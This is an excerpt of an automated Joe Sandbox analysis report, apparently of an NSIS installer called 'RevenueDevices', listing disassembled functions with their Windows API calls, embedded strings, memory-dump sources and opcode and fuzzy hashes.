                                          • Opcode Fuzzy Hash: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                          • Instruction Fuzzy Hash: C5015E7290021CBAEB00DBA4DD85BEEBBB8AF54710F10452ABB50B61D0D7B85A058BA5
                                          APIs
                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                          • MulDiv.KERNEL32(00014200,00000064,?), ref: 00403295
                                          • wsprintfW.USER32 ref: 004032A5
                                          • SetWindowTextW.USER32(?,?), ref: 004032B5
                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                          Strings
                                          • verifying installer: %d%%, xrefs: 0040329F
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: Text$ItemTimerWindowwsprintf
                                          • String ID: verifying installer: %d%%
                                          • API String ID: 1451636040-82062127
                                          • Opcode ID: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                          • Instruction ID: 2210906da4c477318a924a5c8cf459ae641b3a2c10b729e3aa38b42dd2c8d99c
                                          • Opcode Fuzzy Hash: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                          • Instruction Fuzzy Hash: 98014470610109ABEF109F60DD49FAA3B69FB00349F00803DFA46B51E0DB7996558B58
                                          APIs
                                          • lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
                                          • wsprintfW.USER32 ref: 00404457
                                          • SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: ItemTextlstrlenwsprintf
                                          • String ID: %u.%u%s%s$@rD
                                          • API String ID: 3540041739-1813061909
                                          • Opcode ID: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                          • Instruction ID: f1896056faf18a44ee7e341cc3389f256aee6b01e91544d35c55ed1e8b934206
                                          • Opcode Fuzzy Hash: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                          • Instruction Fuzzy Hash: EF11BD327002087BDB10AA6A9D45E9E765EEBC5334F10423BFA15F30E1F6788A218679
                                          APIs
                                          • CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                          • CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                          • CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                          • CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: Char$Next$Prev
                                          • String ID: *?|<>/":
                                          • API String ID: 589700163-165019052
                                          • Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                          • Instruction ID: 6b5d27536512bbf775d32d1a11483b1b035cd55ac1fbc93341df7bc26af2800c
                                          • Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                          • Instruction Fuzzy Hash: C611EB2184061559CB30FB659C4097BA6F9AE56750712843FE886F32C1FB7CCCE192BD
                                          APIs
                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                          • RegCloseKey.ADVAPI32(?), ref: 00401504
                                          • RegCloseKey.ADVAPI32(?), ref: 00401529
                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: Close$DeleteEnumOpen
                                          • String ID:
                                          • API String ID: 1912718029-0
                                          • Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                          • Instruction ID: 29266b44d1cae769f6d8fca298176d7cc4518162af5fbc8546bcefd12e7d5eb7
                                          • Opcode Fuzzy Hash: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                          • Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29
                                          APIs
                                          • GetDlgItem.USER32(?), ref: 004020A3
                                          • GetClientRect.USER32(00000000,?), ref: 004020B0
                                          • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                          • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                          • DeleteObject.GDI32(00000000), ref: 004020EE
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                          • String ID:
                                          • API String ID: 1849352358-0
                                          • Opcode ID: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                          • Instruction ID: a6d8e4af78efbdafb2d3f18e6b80530ac635d705efb76da9f8ac6e555915fa7b
                                          • Opcode Fuzzy Hash: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                          • Instruction Fuzzy Hash: 95F012B2600508AFDB00EBA4EF89DAF7BBCEB04305B104579F642F6161C6759E418B28
                                          APIs
                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: MessageSend$Timeout
                                          • String ID: !
                                          • API String ID: 1777923405-2657877971
                                          • Opcode ID: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                          • Instruction ID: e43e738488dd09895ebc4b193b1bc1394e214230f2e5861cb954e074e697f1bf
                                          • Opcode Fuzzy Hash: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                          • Instruction Fuzzy Hash: 93217171900209ABDF15AFB4D986ABE7BB9EF04349F14413EF602F60E2D6798A40D758
                                          APIs
                                            • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                          • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                          • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                          Strings
                                          • DeleteRegKey: "%s\%s", xrefs: 00402843
                                          • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                          • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                          • API String ID: 1697273262-1764544995
                                          • Opcode ID: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                          • Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
                                          • Opcode Fuzzy Hash: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                          • Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D
                                          APIs
                                          • IsWindowVisible.USER32(?), ref: 00404902
                                          • CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970
                                            • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: Window$CallMessageProcSendVisible
                                          • String ID: $@rD
                                          • API String ID: 3748168415-881980237
                                          • Opcode ID: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                          • Instruction ID: bed307b1c5f775dd60c200178c13c7fdb07d6bd57f5d25ab133f42f3a31df96a
                                          • Opcode Fuzzy Hash: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                          • Instruction Fuzzy Hash: 7A114FB1500218ABEF21AF61ED41E9B3769AB84359F00803BF714751A2C77C8D519BAD
                                          APIs
                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                            • Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                            • Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC
                                          • lstrlenW.KERNEL32 ref: 004026B4
                                          • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                          • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                          • String ID: CopyFiles "%s"->"%s"
                                          • API String ID: 2577523808-3778932970
                                          • Opcode ID: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                          • Instruction ID: a779005ae7d6007116ac0765ed120a10e3eb966af121a96df1e98a57451096ba
                                          • Opcode Fuzzy Hash: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                          • Instruction Fuzzy Hash: A0112171D00214A6CB10FFBA994699FBBBCEF44354F10843FB506F72D2E6B985118B59
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: lstrcatwsprintf
                                          • String ID: %02x%c$...
                                          • API String ID: 3065427908-1057055748
                                          • Opcode ID: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                          • Instruction ID: b8620b589ecf2e5093343df65250d9ec4fb1615d5218d90249241d8ea01b8719
                                          • Opcode Fuzzy Hash: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                          • Instruction Fuzzy Hash: A2014932500214EFCB10EF58CC84A9EBBE9EB84304F20407AF405F3180D6759EA48794
                                          APIs
                                          • OleInitialize.OLE32(00000000), ref: 00405057
                                            • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                          • OleUninitialize.OLE32(00000404,00000000), ref: 004050A5
                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                          • String ID: Section: "%s"$Skipping section: "%s"
                                          • API String ID: 2266616436-4211696005
                                          • Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                          • Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
                                          • Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                          • Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D
                                          APIs
                                          • GetDC.USER32(?), ref: 00402100
                                          • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                          • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                            • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                          • CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A
                                            • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                          Similarity
                                          • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                          • String ID:
                                          • API String ID: 1599320355-0
                                          • Opcode ID: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                          • Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
                                          • Opcode Fuzzy Hash: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                          • Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D
                                          APIs
                                            • Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                          • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
                                          • lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
                                          • lstrcpynW.KERNEL32(?,?,?), ref: 00407261
                                          Strings
                                          Similarity
                                          • API ID: lstrcpyn$CreateFilelstrcmp
                                          • String ID: Version
                                          • API String ID: 512980652-315105994
                                          • Opcode ID: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                          • Instruction ID: 151640cc4cfa07bb85738859349229c9473c158da19ee21f10eacb3052f8d035
                                          • Opcode Fuzzy Hash: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                          • Instruction Fuzzy Hash: 3EF03172A0021CABDB109AA5DD46EEA777CAB44700F100476F600F6191E6B59E158BA5
                                          APIs
                                          • DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
                                          • GetTickCount.KERNEL32 ref: 00403303
                                          • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                          • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E
                                          Similarity
                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                          • String ID:
                                          • API String ID: 2102729457-0
                                          • Opcode ID: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                          • Instruction ID: 401e6cecbc7a0b9e3d471fb50fe358663bd3ad25f9a7ebc527197863dd5a4904
                                          • Opcode Fuzzy Hash: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                          • Instruction Fuzzy Hash: 23F08230502620EBC221AF64FE5CBAB7F68FB04B82701447EF545F12A4CB7849928BDC
                                          APIs
                                          • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
                                          • GetProcAddress.KERNEL32(?,00000000), ref: 00406395
                                          • GlobalFree.KERNEL32(00000000), ref: 0040639E
                                          Similarity
                                          • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                          • String ID:
                                          • API String ID: 2883127279-0
                                          • Opcode ID: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                          • Instruction ID: 581917a1a4a7218ca9fbbc4554f9bfb31441e22884f00dccc1ee77d568dea7f2
                                          • Opcode Fuzzy Hash: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                          • Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675
                                          APIs
                                          • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                          • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                          Strings
                                          Similarity
                                          • API ID: PrivateProfileStringlstrcmp
                                          • String ID: !N~
                                          • API String ID: 623250636-529124213
                                          • Opcode ID: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                          • Instruction ID: 7cd271610f6b1cb64eb4c57d825f56a096f62725fe87e34e9129affe44791136
                                          • Opcode Fuzzy Hash: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                          • Instruction Fuzzy Hash: 37E0E571500208ABDB00BBA0DE85DAE7BBCAF05304F14443AF641F71E3EA7459028718
                                          APIs
                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                          • CloseHandle.KERNEL32(?), ref: 00405C71
                                          Strings
                                          • Error launching installer, xrefs: 00405C48
                                          Similarity
                                          • API ID: CloseCreateHandleProcess
                                          • String ID: Error launching installer
                                          • API String ID: 3712363035-66219284
                                          • Opcode ID: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                          • Instruction ID: c3c9ba135fb9cbcc5263534f4c07e322ce29f53e9eda4e03cc008bde6a4ec24c
                                          • Opcode Fuzzy Hash: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                          • Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68
                                          APIs
                                          • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                          • wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                            • Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                          Strings
                                          Similarity
                                          • API ID: CloseHandlelstrlenwvsprintf
                                          • String ID: RMDir: RemoveDirectory invalid input("")
                                          • API String ID: 3509786178-2769509956
                                          • Opcode ID: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                          • Instruction ID: 8d95e7b1bd6a8fe250904a0927f32055e446839aab417a06e937ad69edd5bb19
                                          • Opcode Fuzzy Hash: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                          • Instruction Fuzzy Hash: 04D05E34150316BACA009BA0DE09E997B64FBD0384F50442EF147C5070FA748001C70E
                                          APIs
                                          • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                          • lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
                                          • CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
                                          • lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                          Similarity
                                          • API ID: lstrlen$CharNextlstrcmpi
                                          • String ID:
                                          • API String ID: 190613189-0
                                          • Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                          • Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
                                          • Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                          • Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4